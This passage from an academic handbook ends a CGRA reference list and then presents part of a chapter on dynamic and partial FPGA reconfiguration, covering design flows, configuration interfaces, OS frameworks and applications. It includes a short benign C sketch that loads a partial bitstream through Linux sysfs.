Support for Programming Languages and Operating Systems (ASPLOS). ACM, Lausanne,
Switzerland
Bansal N, Gupta S, Dutt N, Nicolau A (2003) Analysis of the performance of coarse-grain reconfigurable architectures with different processing element configurations. In: Workshop on Application Specific Processors, vol 12
Baumgarte V, Ehlers G, May F, Nückel A, Vorbach M, Weinhardt M (2003) PACT XPP – a self-
reconfigurable data processing architecture. J Supercomput 26(2):167–184
Betz V, Rose J (1997) VPR: a new packing, placement and routing tool for FPGA research. In: International Workshop on Field Programmable Logic and Applications. Springer, Berlin, Heidelberg, pp 213–222
Brenner JA, Fekete SP, Van Der Veen JC (2009) A minimization version of a directed subgraph
homeomorphism problem. Math Methods Oper Res 69(2):281–296
Burns GF, Jacobs M, Lindwer M, Vandewiele B (2004) Exploiting parallelism, while managing complexity using Silicon Hive programming tools. White paper, vol 42, p 43
Cao P, Liu B, Yang J, Yang J, Zhang M, Shi L (2017) Context management scheme optimization of coarse-grained reconfigurable architecture for multimedia applications. IEEE Trans Very Large Scale Integr (VLSI) Syst 17:2321–2331
Carballo J-A, Chan W-TJ, Gargini PA, Kahng AB, Nath S (2014) ITRS 2.0: toward a re-framing
of the semiconductor technology roadmap. In: 2014 IEEE 32nd International Conference on
Computer Design (ICCD). IEEE, pp 139–146
Chaudhuri S, Hetzel A (2017) SAT-based compilation to a non-von Neumann processor. In:
Proceedings of the 36th International Conference on Computer-Aided Design. IEEE Press,
Irvine, CA, USA, pp 675–682
Chen L, Mitra T (2014) Graph minor approach for application mapping on CGRAs. ACM Trans
Reconfig Technol Syst (TRETS) 7(3):1–25
Chen Y-H, Yang T-J, Emer J, Sze V (2019) Eyeriss v2: a flexible accelerator for emerging deep
neural networks on mobile devices. IEEE J Emerg Sel Top Circuits Syst 9(2):292–308
Chin SA, Anderson JH (2018) An architecture-agnostic integer linear programming approach
to CGRA mapping. In: 2018 55th ACM/ESDA/IEEE Design Automation Conference (DAC).
IEEE, pp 1–6
Chin SA, Sakamoto N, Rui A, Zhao J, Kim JH, Hara-Azumi Y, Anderson J (2017) CGRA-ME:
a unified framework for CGRA modelling and exploration. In: 2017 IEEE 28th International
Conference on Application-Specific Systems, Architectures and Processors (ASAP). IEEE,
Seattle, WA, USA, pp 184–189
Choi K (2011) Coarse-grained reconfigurable array: architecture and application mapping. IPSJ
Trans Syst LSI Des Methodol 4:31–46
Compton K, Hauck S (2002) Reconfigurable computing: a survey of systems and software. ACM Comput Surv (CSUR) 34(2):171–210
Dally WJ, Turakhia Y, Han S (2020) Domain-specific hardware accelerators. Commun ACM
63(7):48–57
DARPA software defined hardware (2019). Online. Available: https://www.darpa.mil/program/
software-defined-hardware
Dave S, Balasubramanian M, Shrivastava A (2018) RAMP: resource-aware mapping for CGRAs.
In: 2018 55th ACM/ESDA/IEEE Design Automation Conference (DAC). IEEE, San Francisco,
CA, USA, pp 1–6
Dennard RH, Gaensslen FH, Yu H-N, Rideout VL, Bassous E, LeBlanc AR (1974) Design of
ion-implanted MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits
9(5):256–268
De Sutter B, Coene P, Vander Aa T, Mei B (2008) Placement-and-routing-based register allocation for coarse-grained reconfigurable arrays. In: Proceedings of the 2008 ACM SIGPLAN-SIGBED Conference on Languages, Compilers and Tools for Embedded Systems, ser. LCTES’08. ACM, Tucson, Arizona, USA, pp 151–160
Di Battista G, Patrignani M, Vargiu F (1998) A split&push approach to 3D orthogonal drawing.
In: International Symposium on Graph Drawing. Springer, Berlin, Heidelberg, pp 87–101
Eisenbeis C, Lelait S, Marmol B (1995) The meeting graph: a new model for loop cyclic register
allocation. In: Proceedings of the 1995 International Federation for Information Processing
Working Group, pp 264–267
Emani M, Vishwanath V, Adams C, Papka ME, Stevens R, Florescu L, Jairath S, Liu W, Nama T,
Sujeeth A (2021) Accelerating scientific applications with SambaNova reconfigurable dataflow
architecture. Comput Sci Eng 23(2):114–119
Fleming KE, Glossop KD, Steely SC Jr, Tang J, Gara AG et al (2020) Processors, methods, and
systems with a configurable spatial accelerator. US Patent 10,558,575, 11 Feb 2020
Fortune S, Hopcroft J, Wyllie J (1980) The directed subgraph homeomorphism problem. Theor
Comput Sci 10(2):111–121
Kuon I, Rose J (2007) Measuring the gap between FPGAs and ASICs. IEEE Trans Comput-Aided
Des Integr Circuits Syst 26(2):203–215
Kuon I, Tessier R, Rose J (2008) FPGA architecture: survey and challenges. Now Publishers Inc.,
Hanover, MA 02339 USA
Kwong J, Chandrakasan AP (2011) An energy-efficient biomedical signal processing platform.
IEEE J Solid-State Circuits 46(7):1742–1753
Lee P, Kedem ZM (1990) Mapping nested loop algorithms into multidimensional systolic arrays.
IEEE Trans Parallel Distrib Syst 1(1):64–76
Lee G, Choi K, Dutt ND (2011) Mapping multi-domain applications onto coarse-grained reconfig-
urable architectures. IEEE Trans Comput-Aided Des Integr Circuits Syst 30(5):637–650
Lee J, Seo S, Lee H, Sim HU (2014) Flattening-based mapping of imperfect loop nests for CGRAs.
In: Proceedings of the 2014 International Conference on Hardware/Software Codesign and
System Synthesis. ACM, Uttar Pradesh, India, p 9
Lee H, Nguyen D, Lee J (2015) Optimizing stream program performance on CGRA-based systems.
In: Proceedings of the 52nd Annual Design Automation Conference, pp 1–6
Li S, Ebeling C (2008) QuickRoute: a fast routing algorithm for pipelined architectures. In: 2004 IEEE International Conference on Field-Programmable Technology (FPT). IEEE, Brisbane, NSW, Australia, pp 73–80
Li Z, Wijerathne D, Chen X, Pathania A, Mitra T (2021) ChordMap: automated mapping
of streaming applications onto CGRA. IEEE Trans Comput-Aided Des Integr Circuits Syst
41(2):306–319
Li Z, Wu D, Wijerathne D, Mitra T (2022) LISA: graph neural network based portable mapping on
spatial accelerators. In: 2022 IEEE International Symposium on High-Performance Computer
Architecture (HPCA). IEEE, Seoul, Korea (South)
Liu D, Yin S, Liu L, Wei S (2013) Polyhedral model based mapping optimization of loop nests
for CGRAs. In: Proceedings of the 50th Annual Design Automation Conference. ACM, San
Francisco, CA, USA, p 19
Liu D, Yin S, Luo G, Shang J, Liu L, Wei S, Feng Y, Zhou S (2018) Data-flow graph mapping
optimization for CGRA with deep reinforcement learning. IEEE Trans Comput-Aided Des
Integr Circuits Syst 38(12):2271–2283
Liu L, Zhu J, Li Z, Lu Y, Deng Y, Han J, Yin S, Wei S (2019) A survey of coarse-grained
reconfigurable architecture and design: taxonomy, challenges, and applications. ACM Comput
Surv (CSUR) 52(6):1–39
Lu W, Yan G, Li J, Gong S, Han Y, Li X (2017) FlexFlow: a flexible dataflow accelerator
architecture for convolutional neural networks. In: 2017 IEEE International Symposium on High
Performance Computer Architecture (HPCA). IEEE, Austin, TX, USA, pp 553–564
McMurchie L, Ebeling C (2008) PathFinder: a negotiation-based performance-driven router for
FPGAs. In: Reconfigurable computing. Elsevier, Burlington, Massachusetts, pp 365–381
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2002) DRESC: a retargetable compiler
for coarse-grained reconfigurable architectures. In: 2002 IEEE International Conference on
Field-Programmable Technology, 2002 (FPT). Proceedings. IEEE, Hong Kong, China, pp 166–
173
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2003a) ADRES: an architecture with
tightly coupled VLIW processor and coarse-grained reconfigurable matrix. In: Proceedings of
the 13th International Conference on Field Programmable Logic and Application, ser. FPL’03.
Springer, Berlin Heidelberg, pp 61–70
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2003b) Exploiting loop-level parallelism
on coarse-grained reconfigurable architectures using modulo scheduling. In: Proceedings of the
2003 Conference on Design, Automation and Test in Europe, ser. DATE’03. IEEE, Munich,
Germany, pp 296–301
Mitra T (2015) Heterogeneous multi-core architectures. Inf Media Technol 10(3):383–394
Moore GE (1998) Cramming more components onto integrated circuits. Proc IEEE 86(1):82–85
Nicol C (2017) A coarse grain reconfigurable array (CGRA) for statically scheduled data flow
computing. Wave Computing White Paper
Nowatzki T, Gangadhar V, Ardalani N, Sankaralingam K (2017) Stream-dataflow acceleration.
In: 2017 ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA).
IEEE, Toronto, ON, Canada, pp 416–429
Park H, Fan K, Mahlke SA, Oh T, Kim H, Kim H-S (2008a) Edge-centric modulo scheduling
for coarse-grained reconfigurable architectures. In: Proceedings of the 17th International Con-
ference on Parallel Architectures and Compilation Techniques, ser. PACT’08. ACM, Toronto,
Ontario, Canada, pp 166–176
Park H, Fan K, Mahlke SA, Oh T, Kim H, Kim H-S (2008b) Edge-centric modulo scheduling
for coarse-grained reconfigurable architectures. In: Proceedings of the 17th International
Conference on Parallel Architectures and Compilation Techniques, pp 166–176
Patterson DA (2006) Future of computer architecture. In: Berkeley EECS Annual Research
Symposium (BEARS), College of Engineering, UC Berkeley, US
Podobas A, Sano K, Matsuoka S (2020) A survey on coarse-grained reconfigurable architectures
from a performance perspective. IEEE Access 8:146719–146743
Prabhakar R, Zhang Y, Koeplinger D, Feldman M, Zhao T, Hadjis S, Pedram A, Kozyrakis C,
Olukotun K (2017) Plasticine: a reconfigurable architecture for parallel patterns. In: 2017
ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA). IEEE,
Toronto, ON, Canada, pp 389–402
Rashid M, Imran M, Jafri AR, Al-Somani TF (2019) Flexible architectures for cryptographic
algorithms – a systematic literature review. J Circuits Syst Comput 28(03):1930003
Rau BR (1994) Iterative modulo scheduling: an algorithm for software pipelining loops. In:
Proceedings of the 27th Annual International Symposium on Microarchitecture. ACM, San
José, CA, USA, pp 63–74
Robertson N, Seymour PD (1990) Graph minors. IX. Disjoint crossed paths. J Comb Theory Ser
B 49(1):40–77
Shao YS, Reagen B, Wei G-Y, Brooks D (2015) The Aladdin approach to accelerator design and
modeling. IEEE Micro 35(3):58–70
Singh H, Lee MH, Lu G, Kurdahi FJ, Bagherzadeh N, Chaves Filho EM (2000) MorphoSys: an
integrated reconfigurable system for data-parallel and computation-intensive applications. IEEE
Trans Comput 49(5):465–481
Suh D, Kwon K, Kim S, Ryu S, Kim J (2012) Design space exploration and implementation of a
high performance and low area coarse grained reconfigurable processor. In: 2012 International
Conference on Field-Programmable Technology. IEEE, Seoul, Korea (South), pp 67–70
Tu F, Yin S, Ouyang P, Tang S, Liu L, Wei S (2017) Deep convolutional neural network architecture
with reconfigurable computation patterns. IEEE Trans Very Large Scale Integr (VLSI) Syst
25(8):2220–2233
Tuhin MAA, Norvell TS (2008) Compiling parallel applications to coarse-grained reconfigurable
architectures. In: 2008 Canadian Conference on Electrical and Computer Engineering. IEEE,
Niagara Falls, ON, Canada, pp 001723–001728
Venkataramani S, Choi J, Srinivasan V, Wang W, Zhang J, Schaal M, Serrano MJ, Ishizaki K, Inoue
H, Ogawa E et al (2019) DeepTools: compiler and execution runtime extensions for rapid AI
accelerator. IEEE Micro 39(5):102–111
Wang Y, Li P, Zhang P, Zhang C, Cong J (2013) Memory partitioning for multidimensional arrays
in high-level synthesis. In: Proceedings of the 50th Annual Design Automation Conference,
pp 1–8
Wang B, Karunarathne M, Kulkarni A, Mitra T, Peh L-S (2019) HyCUBE: a 0.9 V 26.4
MOPS/mW, 290 pJ/op, power efficient accelerator for IoT applications. In: 2019 IEEE Asian
Solid-State Circuits Conference (A-SSCC). IEEE, Austin, TX, USA, pp 133–136
15 Dynamic and Partial Reconfiguration of FPGAs
S. A. Fahmy and K. B. Iyer
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 508
FPGA Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
Designing Partially Reconfigurable Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
Managing Partial Reconfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
Applications of Dynamic Partial Reconfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 519
Computing Infrastructure and Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 520
Design Compilation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Adaptive Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 522
Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 524
Reliability and Harsh Environments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 524
Research Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
Abstract
S. A. Fahmy
King Abdullah University of Science and Technology (KAUST), Department of Computer,
Electrical and Mathematical Sciences and Engineering, Thuwal, Saudi Arabia
e-mail: [email protected]
K. B. Iyer
Computer Science, King Abdullah University of Science and Technology, Thuwal, Saudi Arabia
e-mail: [email protected]
Keywords
Introduction
Fig. 1 Configuration of a simplified logic element showing 64-bit LUT6 contents determining the logic function, a flip-flop as a latch with initial state, and multiplexer select pins set by the values in the configuration memory
Fig. 2 Configuration of a route between two logic blocks (LBs) through configuring the connection boxes and the switch box that connect them
device. This opens the door to hardware designs where parts can be modified at
runtime based on functional needs. A static region contains the parts of the hardware
design that remain active throughout operation, while one or more partial regions
contain functionality which can be swapped out during operation.
This capability has found use in a variety of applications, such as cognitive radio
systems that modify their hardware baseband processing depending on operating
requirements, computer vision systems that adapt the type of image processing
depending on the properties of the scene, virtualization of FPGA interfaces for gen-
eralized accelerator deployments, and resilient designs that are robust to radiation
effects in space.
This chapter discusses the mechanisms that enable dynamic and partial reconfiguration, describes how to design such systems, and gives examples of applications that exploit these capabilities. Future challenges in this research area are also identified. Various existing surveys delve into these aspects in more detail, and readers are referred to these (Compton and Hauck 2002; Koch 2012; Vipin and Fahmy 2018; Vaishnav et al. 2018).
FPGA Configuration
One of the obstacles to wider adoption of PR has been design complexity. Most
FPGA designers are content with writing RTL code and letting FPGA tools manage
the complexity of mapping to the target architecture. Indeed, in such cases, the
designer need not know much about the types of resources on the FPGA and their
arrangement in silicon. Optimization for high frequency tends to require both some
understanding of the underlying hardware primitives and, potentially, some spatial
floorplanning, wherein the location of hardware primitives is fixed. However, this
remains a specialist skill. Designing a PR system on FPGA requires awareness of
this physical arrangement and consideration of its features at a finer level than many
designers consider. FPGA tool vendors have been improving their tools recently,
but this additional complexity remains a barrier to entry. The PR development flows
from both AMD/Xilinx and Intel/Altera follow a similar structure.
For consistency, a common terminology is defined first. PR development requires
the area of the FPGA to be divided into a static region (SR) and one or more partially
reconfigurable regions (PRRs). The static region hosts the static module, which
is initialized once during the configuration lifetime (until power-off). The static
module can include logic to manage partial reconfiguration, such as communication
with the ICAP or decoupling signal circuitry.
The partially reconfigurable regions (PRRs) can be reconfigured multiple times
during system lifetime. Reconfigurable modules (RMs) are the designs configured
into the PRRs. A configuration is a valid combination of the SR and a set of
RMs allocated to the PRRs in the design. A full bitstream includes the static
module and an RM instance for each PRR. A partial bitstream only contains an
instance of an RM for a particular PRR. Figure 3 shows these regions and the
associated bitstreams. In generating partial bitstreams for RMs, these are validated
against the static module to ensure correctness and compatibility. Subsequently, all
bitstreams, including static and partial, must be generated prior to configuration.
Since both static and partial bitstreams must be generated through the full hardware
implementation flow, which is time-consuming, their functionality, arrangement,
and design must be determined up front.
Signals that interface the SR and PRRs must be locked in place (which is now
automated by the tools), so that the multiple RMs all route their matching interfaces
to these signals. RMs in the same PRR can have different interface signals, but the
SR must implement all the required signals to interface with them.
The PR design tools start by synthesizing all RMs separately. The SR is also
synthesized with the RMs replaced by black boxes, i.e., empty modules. Only during
the implementation stage are the synthesized netlists of the RMs populated into the
black boxes.
PRRs must be drawn manually in the implementation stage, ensuring they align with clock region boundaries. It is preferred that PRRs be rectangular in order to have uniform resources; any other shape is likely to cause routing congestion (Xilinx 2023).
Fig. 3 A partially reconfigurable design comprising a static region (SR) and two partially
reconfigurable regions (PRRs), A and B. Full bitstreams can be used to configure the whole
FPGA, while partial bitstreams allow individual PRRs to be configured to a specific function. The
granularity of regions is limited to device-specific constraints based on clock regions and resource
arrangements
Additionally, not all resources are reconfigurable. LUTs, FFs, DSPs, CMACs, PCIe interfaces, and clocks and clock-modifying logic such as BUFGs and PLLs are reconfigurable. Similarly, I/O and I/O-related components such as drive strength, driver output impedance, and SERDES are also reconfigurable. However, components such as BSCAN, JTAG, and ICAP are not reconfigurable.
One RM for each PRR is incorporated and a complete netlist (comprising the
SR and an RM for each PRR) is generated. At this point, the static design is
locked, meaning that its physical use of resources is fixed. Subsequent RMs are swapped into each PRR, and the same process is repeated to determine their own implementation.
Netlists are generated for all configurations defined by the designer, resulting
in a full bitstream for every configuration and partial bitstreams as needed for the
PRRs to implement all configurations. Figure 4 shows an overview of the stages of
designing a PR system. There are a number of academic tools that seek to further
enhance the PR build flow.
Determining how many PRRs to use and which RMs to allocate to each PRR
is non-trivial. Fewer PRRs containing multiple larger RMs mean that each time
any part of an RM needs to be modified, the whole PRR must be reconfigured,
increasing bitstream size and reconfiguration time.
Fig. 4 The partial reconfiguration design flow. Reconfigurable modules are separately synthe-
sized. Static logic is first passed to the design flow with reconfigurable modules as a black box.
A floorplan is created for the PRRs, each of which is populated by the synthesized modules.
Placement and routing are carried out on a valid configuration with PRRs populated with the
corresponding RMs. This process is repeated for all valid configurations. Finally, bitstreams are
generated for valid configurations
Fig. 5 The nested PR flow with two different nested PRR allocations allowing the location and
size of these PRRs to be modified at runtime, thereby enhancing flexibility
Fig. 6 The abstract shell flow enhances the traditional PR design flow by generating abstract shell
checkpoints for each PRR that enable partial bitstreams to be generated without needing the full
bitstream
Once a design has been compiled and all the full and partial bitstreams generated,
the system can use these to switch between hardware configurations. A full
bitstream is first loaded, instantiating the SR and potentially an RM in each PRR.
(It is possible to create a configuration with an empty RM in each PRR for the
initial state.) Partial bitstreams are similar in format to full bitstreams, except
they contain only the configuration data associated with their PRRs and are hence
smaller. To switch configurations, a partial bitstream must be loaded into the
configuration memory. This can be done over any of the suitable configuration
interfaces (Table 1). External JTAG is the slowest, averaging 10s of Mbps, while
SelectMap (for AMD/Xilinx) and Active Serial (for Intel/Altera) allow for 100s of
Mbps depending on the bus width. These interfaces must be controlled by external
hardware, such as a distinct processor or externally connected computer through a
dedicated programming cable.
For PCIe-hosted FPGAs, AMD/Xilinx provides the MCAP interface, while
Intel/Altera provides CvP. These allow a host machine to transfer bitstreams over
the PCIe interface. For MPSoC designs, the embedded processor can manage
configuration of the programmable FPGA fabric over a controller in the SoC portion
of the chip; in the case of AMD/Xilinx, this is called the PCAP.
Table 1 Configuration interfaces and their range of supported bandwidths and resulting approxi-
mate configuration times for averagely sized bitstreams. Times marked * are negatively impacted
by the overhead of individual word writes. Numbers assume interfaces operate in insecure mode,
meaning data is transferred at max bandwidth. Some interfaces support various clock rates
Type                 AMD/Xilinx   Intel/Altera             Bandwidth (Gbps)   Reconfig. time (ms)
External             JTAG         JTAG                     0.030–0.066        ≈10000*
External             SelectMap    Active Serial (AS)/FPP   0.66–3.2           ≈100*
Internal             ICAP         PR Controller            2–6.4              ≈10
PCIe                 MCAP         CvP                      6.4                ≈100*
Processor subsystem  PCAP         FPGA Manager             3.2–6.4            ≈30*
A set of vendor APIs is provided which can be integrated into user bare-metal software running on the
processors. However, these deal with passing raw bitstream data to the configuration
controller. Reconfiguration using these APIs is a blocking operation, requiring
custom designs to overcome this, as was done in Vipin and Fahmy (2014b) where
custom interrupts are exploited to allow bitstream DMAs to complete while the
processor is busy with other tasks.
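To make this concrete, under Linux the kernel's FPGA Manager subsystem abstracts such
controllers; on AMD/Xilinx SoC platforms a partial bitstream placed in /lib/firmware can
typically be loaded through sysfs. The following minimal C sketch illustrates this under
stated assumptions: the sysfs paths and the flag encoding follow the AMD/Xilinx Linux
kernel convention (mainline kernels may instead use device tree overlays), and the
function name is illustrative.

#include <stdio.h>

/* Illustrative sketch: load a partial bitstream through the Linux FPGA
 * Manager sysfs interface (AMD/Xilinx kernel convention). */
int load_partial_bitstream(const char *name /* file under /lib/firmware */)
{
    /* Bit 0 of the flags attribute requests partial reconfiguration. */
    FILE *f = fopen("/sys/class/fpga_manager/fpga0/flags", "w");
    if (!f) return -1;
    fprintf(f, "1\n");
    fclose(f);

    /* Writing the firmware name triggers the bitstream transfer
     * (over the PCAP on Zynq-class devices). */
    f = fopen("/sys/class/fpga_manager/fpga0/firmware", "w");
    if (!f) return -1;
    fprintf(f, "%s\n", name);
    fclose(f);
    return 0;
}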
Managing PR within an OS running on the host processor requires additional
integration. The generally supported approach is a fixed shell into which RMs can
be compiled to generate partial bitstreams, which can then be loaded by making calls
to an API that manages the transfer of bitstream data. ARTICO3 (Rodríguez et al.
2018) is a framework for the AMD/Xilinx Zynq and ZynqMP MPSoCs that allows
custom kernels to be integrated into a software managed platform with automation
of access to the memory hierarchy and abstracted PR. Heterogeneous tasks can be
exploited to enhance runtime and energy efficiency.
ReconOS (Agne et al. 2014) is a more flexible, fully developed OS abstraction
for managing PR systems. It tries to unify the management of software and
hardware tasks through a unified thread abstraction. Hardware threads are managed
through PR and different threads can communicate with each other through various
mechanisms. However, the OS kernel must be recompiled to support new hardware
threads.
FOS (Vaishnav et al. 2020) decouples the development of hardware and
software for heterogeneous embedded systems while supporting multi-tenancy and
abstracted loading of partial bitstreams. However, similar to the above frameworks,
this requires all RMs to abide by the uniform shell interface specification. This
abstraction works well for pure compute acceleration, but not for some embedded
systems where the required interfacing of modules can vary.
ZyPR (Bucknall and Fahmy 2023) extends abstractions further by allowing
Linux Device Tree Overlays (DTOs) to be updated dynamically based on the loaded
RMs with these being enumerated during the build process. This allows for RMs
that access different external I/O to be supported. Additionally, ZyPR presents
an abstracted configuration view to the user through its API, with its middleware
translating these configuration changes into the required bitstream loading.
Coyote (Korolija et al. 2020) applies various OS abstractions to management of
FPGAs, including a process model, scheduling, virtual memory, and I/O virtualiza-
tion. It also supports partial reconfiguration of FPGA tasks using similar approaches
to those described in Section “FPGA Configuration”.
Having discussed the mechanisms and design approach for dynamically and partially
reconfigurable systems, the ways in which this capability can be exploited in a variety
of applications are now discussed in some detail.
One of the key benefits of FPGAs as a computation platform is their highly
flexible I/O: FPGAs can implement a wide range of interfaces that allow them
to be integrated into a variety of deployment scenarios. For generalized compute
acceleration, this has often been as PCIe accelerators much like GPUs. In such
a deployment, a fixed set of FPGA pins is dedicated to implementing the PCIe
interface, along with the use of soft or hard PCIe interfacing logic in the FPGA. The
required accelerator is integrated with this interface logic, and the FPGA can be
addressed much like a GPU, as an accelerator for offloading from a host processor.
Frameworks like RIFFA (Jacobsen et al. 2015) enabled accelerator designers to
automate the process of building the PCIe interface logic and integrating it with
their accelerator design, as well as offering software drivers to manage offload.
However, each different accelerator would require a full FPGA design build with
the integrated PCIe interface logic and a static reconfiguration of the FPGA, often
accompanied by a system reboot, when changing functions.
The DyRACT framework (Vipin and Fahmy 2014a) was the first to use partial
reconfiguration to keep the PCIe interface logic active in between reconfigurations
of the accelerator logic and to load these bitstreams over PCIe. This concept of
an interface shell, in which the required external interfaces and the reconfiguration
management hardware reside in static logic while the accelerator function resides in
dynamic logic loaded through partial reconfiguration, is now widespread.
Microsoft’s Catapult project (Caulfield et al. 2016) refers to the static portion
as the Blue Bitstream and the user’s function as the Green Bitstream. Amazon’s
AWS F1 (Amazon Inc. 2024a) refers to the Shell and Custom Logic. This approach is
essential to productive use of FPGAs as accelerators as it means the FPGA’s state
does not adversely affect the host machine, and that the FPGA can be put to
use for diverse application needs as those needs change over time. AMD/Xilinx’s
Xilinx Runtime Library (XRT) (Xilinx Inc. 2024b) integrates a host-based runtime with
a hardware platform composed of the static Shell and User portions as above. In
some of these frameworks, multiple concurrent accelerators are supported, thereby
enabling multiple applications to share the FPGA resources and interface access,
often referred to as multi-tenancy (Nguyen and Kumar 2020).
In recent years, data center use of FPGAs has increased, and the ability of FPGAs
to directly process network packets has become important. FPGA Smart NICs have
thus become more commonplace. These are FPGA accelerator cards with PCIe
interfaces as above, but with high-speed network interfaces now also serving to
interface with the datacenter network. Frameworks like Corundum (Forencich et al.
2020) and AMD OpenNIC (Xilinx Inc. 2024) offer analogous solutions to RIFFA that
extend to the network interface. As of now, these functions are usually integrated
in static bitstreams, but the role of reconfiguration to enhance flexibility is expected
to see these frameworks extended to support partial reconfiguration soon. Serving
as a “bump in the wire” NIC, i.e., passing all packets to a host, while potentially
processing a subset of them, requires that any reconfiguration of function does not
disrupt the flow of packets to the host.
Design Compilation
A major challenge with FPGA design is the compilation time from synthesis to
bitstream generation. This can be hours, or even days, long for complex designs.
This is problematic in the development cycle, where even a small change can add
many hours to compilation time.
SPADES (Nguyen et al. 2023) demonstrates the effective use of the hard Network
on Chip (NoC) in AMD Versal devices, leading to significant gains in compilation time.
Adaptive Systems
FPGAs have found widespread use in embedded systems where they can often
absorb all the required computing capability to implement complex systems that
interact with their environment. This is even more prevalent now with the wide
availability of FPGA SoCs that integrate processor cores with the programmable
fabric on the same chip, providing software programmability alongside tightly
coupled hardware acceleration. Many
of these applications in communications, automotive, industrial control, etc. require
some level of adaptability to evolving conditions and PR allows these systems to
modify their accelerated computing functions as needed at runtime. However, as
alluded to in Section “Designing Partially Reconfigurable Systems,” the design
process can become an obstacle to adoption by domain experts.
Cognitive radio systems have been widely implemented on FPGAs using PR.
This application requires a radio system to modify its baseband radio processing
algorithms based on changing requirements. Baseband processing chains are usually
implemented in hardware to enable high throughput and low latency. Since the
required hardware can be significantly different for different operating modes,
multiplexing the various modes can be costly in terms of area. PR allows such radio
systems to switch between different modes, e.g., sensing and multiple baseband
modes, dynamically at runtime. This allows the radio systems to consume less
area and power while still supporting dynamic operation. An example design in
Sadek et al. (2017) shows a multi-mode 3G, LTE, and WiFi transceiver that uses PR to
switch modes, reducing power consumption by 66% compared to a multiplexed
design while requiring less than 1.5 ms to switch modes. A similar approach
combining PR with module parameterization improves reconfiguration time (Pham
et al. 2017).
In vision systems, there can be various forms of data-dependent processing that
require different accelerators. Rather than implementing all modes and selecting
between them in a static design, PR allows the active vision processing modules to
be swapped at runtime.
Fig. 7 A vision application on an AMD/Xilinx Zynq UltraScale+ MPSoC device, showing the PS
running software that adapts the types of vision filters executed in the PL using PR (Bucknall 2022)
Such a processing loop, typical in adaptive systems, can be mapped well to FPGA SoCs where context
switches can be applied through PR (Fahmy 2018). PR can also support various
robustness and failure recovery modes in such systems (Paulsson et al. 2006).
Machine Learning
Significant work has been conducted on optimizing deep neural network accelerator
hardware. These optimizations often require mixed or custom numerical precision
support, and FPGAs are ideally suited to such hardware designs. FPGAs have
been used to implement accelerators for models with precision ranging from 32-
bit floating point, through various fixed point representations, down to binary neural
networks, being able to trade off area against a tolerable accuracy loss.
In Hussain et al. (2015), the authors build a multi-classifier system that can switch
between support vector machine (SVM) and K nearest neighbor (KNN) classifiers
dynamically at runtime and demonstrate that this is up to 8× faster than traditional
full bitstream reconfiguration.
In Irmak et al. (2021), the authors demonstrate how PR can be used to
dynamically switch convolutional neural network (CNN) architectures for multiple
applications. They show that having optimized CNNs for different applications and
swapping them using PR is preferable in terms of accuracy to training a hybrid CNN
while still offering low latency.
In Venieris and Bouganis (2017), the authors build a CNN design framework
that allows multiple blocks of a CNN to be allocated to the same hardware
accelerator through weight-only reconfiguration, while amortizing the more costly
partial reconfiguration for other blocks by using larger batch sizes to achieve
low latency.
CascadeCNN (Kouris et al. 2018) switches between accelerator hardware with
different numerical precision and hence accuracy. If a sample's classification is
flagged as potentially incorrect, it is recomputed with a slower, higher-precision
model; otherwise, the faster inference is accepted. Partial reconfiguration is suggested as a way to switch
between these models.
doses. SRAM FPGAs, however, which are more prevalent, can suffer single event
upsets (SEUs) in their configuration memory, a change in a bit’s state. This is highly
problematic since an upset can modify the configured datapath and even lead to an
incorrectly configured FPGA.
Space is a commonly considered harsh environment. FPGAs are popular in space
applications due to increasing processing requirements and the need for custom
processing architectures (Osterloh et al. 2009). Radiation in space is a result of
cosmic rays or high-energy particles which can strike devices. FPGAs are also
widely used in high-energy physics experiments where they are used to process
detector data to extract important features for further analysis. In such experiments,
the radiation environment is driven by the types of experiments being performed,
which typically involve strong radiation fields and high-energy particles.
There are a variety of approaches for tackling reliability in such environments,
including spatial redundancy, such as triple modular redundancy (TMR). However,
a solution unique to FPGAs is configuration scrubbing. This is where the config-
uration memory is repeatedly rewritten to combat potential SEUs. It is possible to
read the contents of this memory and rewrite it periodically, or else to continuously
write the known good configuration (Stoddard et al. 2016). This approach remains
imperfect since it is periodic and takes time, so it is typically combined with spatial
approaches (Bolchini et al. 2007; Ichinomiya et al. 2010). An automated framework
for isolated partially reconfigurable modules with TMR was presented in Pham
et al. (2018). In Iturbe et al. (2011), the authors present the R3TOS framework that
combines a runtime scheduler with reliability heuristics to allocate hardware tasks
in a way that minimizes the effects of SEUs and ionizing radiation.
FPGAs can also offer enhanced robustness to failures. In Dörr et al. (2019) the
authors demonstrate the use of PR to manage a fallback processor to support
fail-operational behavior in a complex system. In Oszwald et al. (2018), the authors demonstrate that this
capability can meet safety requirements for automotive applications. In Shreejith
et al. (2013), PR is used to recover from faults while a redundant unit manages data
processing. This is done at the network level to minimize time overhead.
FPGAs can also serve as a fallback mechanism for any arbitrary faults in the
